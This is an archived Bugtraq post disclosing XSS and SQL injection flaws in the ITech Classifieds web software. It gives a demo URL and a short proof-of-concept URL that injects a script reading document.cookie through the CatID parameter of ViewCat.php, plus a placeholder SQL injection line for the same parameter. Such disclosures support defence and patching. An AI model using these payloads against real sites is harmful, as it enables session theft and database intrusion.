ITech Classifieds Multiple Remote Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ITech Classifieds Multiple Remote Vulnerabilities
From: cybermilitan@xxxxxxxxxxx
Date: 1 Feb 2008 22:51:54 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Title  : ITech Classifieds Multiple Remote Vulnerabilities

Author : Crackers_Child

Bug    : SQL Injection + XSS

Demo   : http://itechclassifieds.com/demo/

Exp    : /ViewCat.php?CatID=<script>Alert(document.cookie)</script>

Exp    : /ViewCat.php?CatID=SQL Injection /*

Greetz :   www.aq.com     www.sibersavascilar.com    www.biyofrm.com

Prev by Date: Domain Trader v2.0 Xss Vulnerable
Next by Date: phpShop <= v 0.8.1 Remote SQL injection / Filter Bypass
Previous by thread: Domain Trader v2.0 Xss Vulnerable
Next by thread: phpShop <= v 0.8.1 Remote SQL injection / Filter Bypass
Index(es):
- Date
- Thread